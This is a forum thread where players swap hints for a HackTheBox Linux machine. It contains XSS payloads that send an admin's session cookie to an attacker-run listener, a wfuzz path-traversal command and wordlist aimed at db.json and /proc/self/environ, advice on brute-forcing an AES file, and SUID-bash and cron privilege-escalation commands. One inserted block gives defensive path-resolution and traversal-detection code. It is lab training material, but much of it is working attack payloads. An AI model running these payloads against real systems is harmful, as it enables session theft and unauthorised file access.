
coolBro @coolBro123 4 days ago any content?
Linux · Medium
Access is restricted by HackTheBox rules
The solution to this machine can be published publicly after the machine is retired.
A non-public solution can be found in the Telegram channel.
Confuse_pe... @confuse 3 days ago Register a regular account, use bug report / XSS to steal an admin session cookie → access admin panel. I am trying to do this, but every time I report the bug with XSS in it, I don't get any cookie back.
lexi143 @Lexi143 3 days ago @confuse Start a listener on your machine on 8000. Then do a bug report using this: script fetch("http://YOUR-IP:8000?" + document.cookie) script. You'll need to add <> and <\> as I couldn't add it here. I did both subject and body; you should then get a response from your target IP with the session cookie.
dev @dev 3 days ago @Lexi143 Can you tell me how?
Alex @Alex-cyber 3 days ago @Lexi143 I put the exact command with the <> in the title and body and I still got nothing on my listener. Do you know why?
lexi143 @Lexi143 3 days ago @Alex-cyber My mistake. You don't need script. Just put the following in the bug report: img src=x onerror="new Image().src='http://your-ip:8000/?='+encodeURIComponent(document.cookie)" and wrap this command in <>. Again, I did this in Bug name and Bug details. And just make sure your listener is set on 8000. I used python3 -m http.server 8000 for my listener.
Alapatra t... @alapatra-toli-10 3 days ago @Lexi143 I have tried this and still got no response from the server. I only got "Bug submitted. Admin review is in progress." but still got no cookie response.
Sentinal @sentinal36 3 days ago @alapatra-toli-10 Try an iframe with fetch and wait a minute.
Alapatra t... @alapatra-toli-10 3 days ago @sentinal36 I have been waiting for a reply for about 20 minutes.
Sentinal @sentinal36 3 days ago @alapatra-toli-10 iframe src="javascript:fetch('http://IP:Port/?cookie='+encodeURIComponent(document.cookie))" Try this.
Sentinal @sentinal36 3 days ago @sentinal36 The less-than sign is being deleted. You need to put it at the beginning and the end.
Alapatra t... @alapatra-toli-10 3 days ago @sentinal36 Why is my netcat or Python HTTP server not receiving this? I am using Pwnbox to test. The previous XSS didn't work and this one is also not working.
Sentinal @sentinal36 2 days ago @alapatra-toli-10 iframe src="javascript:var x=new XMLHttpRequest();x.open('GET','http://IP:PORT/?c='+document.cookie,true);x.send();" Maybe that works; if it doesn't, there has to be a problem with the machine or VPN or whatever, because it worked for me.
Alapatra t... @alapatra-toli-10 2 days ago @sentinal36, thank you for giving me a hint. I have already completed the XSS process. My firewall was interrupting the three-way handshake. I have allowed it in my firewall. Thank you for helping me.
test @test 2 days ago @Lexi143 I tried, bro, but it escapes <>? What should I do?
Peter @petpan 2 days ago @test Kali# python3 -m http.server 1337 Website Bug Report -> Bug Name / Summary :
Peter @petpan 2 days ago @test This string should be inside < > img src=x onerror=fetch('http://YOUR IP ADDRESS:1337/?c='+btoa(document.cookie))
Mr Orbit @0x0r61t 2 days ago @Lexi143 I got a cookie in reply, but they give me my own cookie back.
test @test 2 days ago @petpan I have a doubt: how can we confirm that a db.json file exists at that path?
test @test 2 days ago @0x0r61t Try having something meaningful like "image upload issue".
Alapatra t... @alapatra-toli-10 1 day ago @test You can check the backward directory, like cd ../../hello_world
Alapatra t... @alapatra-toli-10 1 day ago How can I crack the AES? Should I go with brute force, or was the password stored in some directory or path? I need a hint.
test @test 1 day ago @alapatra-toli-10 Nahh bro, I have found the web user. How did you guys confirm that there exists a db.json file at the path?
Alapatra t... @alapatra-toli-10 1 day ago @test You can check the Python code. There is a register path which saves the data in db.json, hashing the password. That way I know there is a file that saves the current credentials of all the users.
Peter @petpan 1 day ago @test ┌──(Lucifer㉿TheDevil)-[~/HTB/Imagery/PP] └─$ wfuzz -c -z file,paths.txt -u 'http://imagery.htb:8000/admin/get_system_log?log_identifier=FUZZ' -H 'Cookie: session=.eJw9jbEOgzAMRP_Fc4UEZcpER74iMolLLSUGxc6AEP-Ooqod793T3QmRdU94zBEcYL8M4RlHeADrK2YWcFYqteg571R0EzSW1RupVaUC7o1Jv8aPeQxhq2L_rkHBTO2irU6ccaVydB9b4LoBKrMv2w.aNzR8A.7Zk7t9Y-cQcpWMVHoe99Kbr6yxk' --hc 404
Peter @petpan 1 day ago @test paths.txt (snippet): ../db.json ../../db.json ../../../db.json ../db.jason ../../db.jason db.json /data/db.json /config/db.json /backup/db.json
test @test 15 hours ago @petpan Ohh, thanks man. Where did you get this wordlist?
test @test 15 hours ago @alapatra-toli-10 What was the name of the file, bro?
heisenberg @heisenberg 3 hours ago @petpan Bro, how did you come up with this wordlist, and how to retrieve all files in the directory?
qwerty @qwerty 1 day ago I can trigger the /etc/passwd file... but how to find other files like db.json, app.py...? What would be the path for other files...?
Peter @petpan 1 day ago @qwerty Use Burp for that: GET /admin/get_system_log?log_identifier=../db.json HTTP/1.1
Peter @petpan 1 day ago @qwerty Or a web browser: http://imagery.htb:8000/admin/get_system_log?log_identifier=../db.json
Sentinal @sentinal36 1 day ago @qwerty Dude, first check ../../../../proc/self/environ. That gives you the path the web application is running on. After that you'll try to add known names like db.json, api.py, app.py (../../../../bla/bla/app.py).
test @test 15 hours ago @sentinal36 It's empty, bruh.
heisenberg @heisenberg 3 hours ago @sentinal36 Bro, like, how to retrieve all files in the directory?
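Added example, written here for the defender's side and not taken from the machine or from any post above: the kind of unsafe path join that lets `log_identifier=../db.json` read outside the log directory, a hardened resolver beside it, and a detector that flags such requests in access-log lines. `LOG_DIR`, the identifier allow-list and the sample log lines are constructed assumptions, not the real application's layout.

```python
import os
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed demo base directory; the real app's path is not known from the thread.
LOG_DIR = "/var/app/logs"
# Allow-list: identifiers may only be plain names ending in .log (assumption).
IDENTIFIER_RE = re.compile(r"[A-Za-z0-9_-]+\.log")


def resolve_unsafe(log_identifier: str) -> str:
    """Vulnerable form: user input joined to the base directory as-is.
    '../db.json' normalises to /var/app/db.json, outside LOG_DIR."""
    return os.path.normpath(os.path.join(LOG_DIR, log_identifier))


def resolve_safe(log_identifier: str):
    """Hardened form: reject anything outside the allow-list, then confirm the
    normalised path is still under LOG_DIR. Returns None when rejected."""
    if not IDENTIFIER_RE.fullmatch(log_identifier):
        return None
    full = os.path.normpath(os.path.join(LOG_DIR, log_identifier))
    if os.path.commonpath([LOG_DIR, full]) != LOG_DIR:
        return None
    return full


def flag_traversal_requests(access_log: str) -> list:
    """Detection: return every decoded log_identifier whose resolved path
    escapes LOG_DIR (absolute paths and ../ sequences alike)."""
    flagged = []
    for line in access_log.splitlines():
        m = re.search(r'"GET (\S+) HTTP/1\.[01]"', line)
        if not m:
            continue
        params = parse_qs(urlsplit(m.group(1)).query)
        for ident in params.get("log_identifier", []):
            ident = unquote(ident)  # second decode catches double-encoded input
            full = os.path.normpath(os.path.join(LOG_DIR, ident))
            if os.path.commonpath([LOG_DIR, full]) != LOG_DIR:
                flagged.append(ident)
    return flagged


# Constructed sample access-log lines (not real traffic).
SAMPLE_ACCESS_LOG = """\
10.10.14.5 - - [01/Jan/2025:10:00:01 +0000] "GET /admin/get_system_log?log_identifier=app.log HTTP/1.1" 200 512
10.10.14.5 - - [01/Jan/2025:10:00:02 +0000] "GET /admin/get_system_log?log_identifier=../db.json HTTP/1.1" 200 2048
10.10.14.5 - - [01/Jan/2025:10:00:03 +0000] "GET /admin/get_system_log?log_identifier=..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 0
"""
```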
Alapatra t... @alapatra-toli-10 1 day ago Can anyone help me with the AES file? How can I crack it? I have been trying to brute-force the password for at least 5 hrs and still no success with rockyou.txt.
Sentinal @sentinal36 1 day ago @alapatra-toli-10 pip3 install pyAesCrypt, after that ask an AI service (DeepSeek, Gemini, whatever) to write a brute-force script for you with rockyou.txt.
Alapatra t... @alapatra-toli-10 1 day ago @sentinal36 I already did that, still no response. I have already used 700000+ passwords and it's still going.
Alapatra t... @alapatra-toli-10 1 day ago @sentinal36 I have tried and waited 9 hours, and at last it says password not found. Can anyone help me?
raphaeltot... @raphaeltotoso 1 day ago How can I privilege escalate using charcol? Do you have the command line? I'm trying to execute auto add --schedule "* * * * *" --command "cp /bin/bash /tmp/pwn && chmod +s /tmp/pwn" --name "romeu" and after this /tmp/pwn -p, but this is not working.
Alapatra t... @alapatra-toli-10 21 hours ago @raphaeltotoso You don't have to use charcol. By the way, you can SSH as web and use this command: /usr/bin/bash -p. This will help you enter bash and you can have root access. I have finally finished this machine. Thank you "xone" for providing this great hint, and also thank you to all the players that helped me by providing hints.
noclue @noclue 11 hours ago @raphaeltotoso I also tried this one and the copy doesn't work somehow, but the original /bin/bash file can be used to do privilege escalation, just add -p. Concerning that I can't log in via SSH like the other guys here, this might be another bug, I guess.
Alapatra t... @alapatra-toli-10 10 hours ago @noclue There is a secret key which helps you create an authorized key for web, which will help us connect via SSH as web. Yes, you can use the original bash command.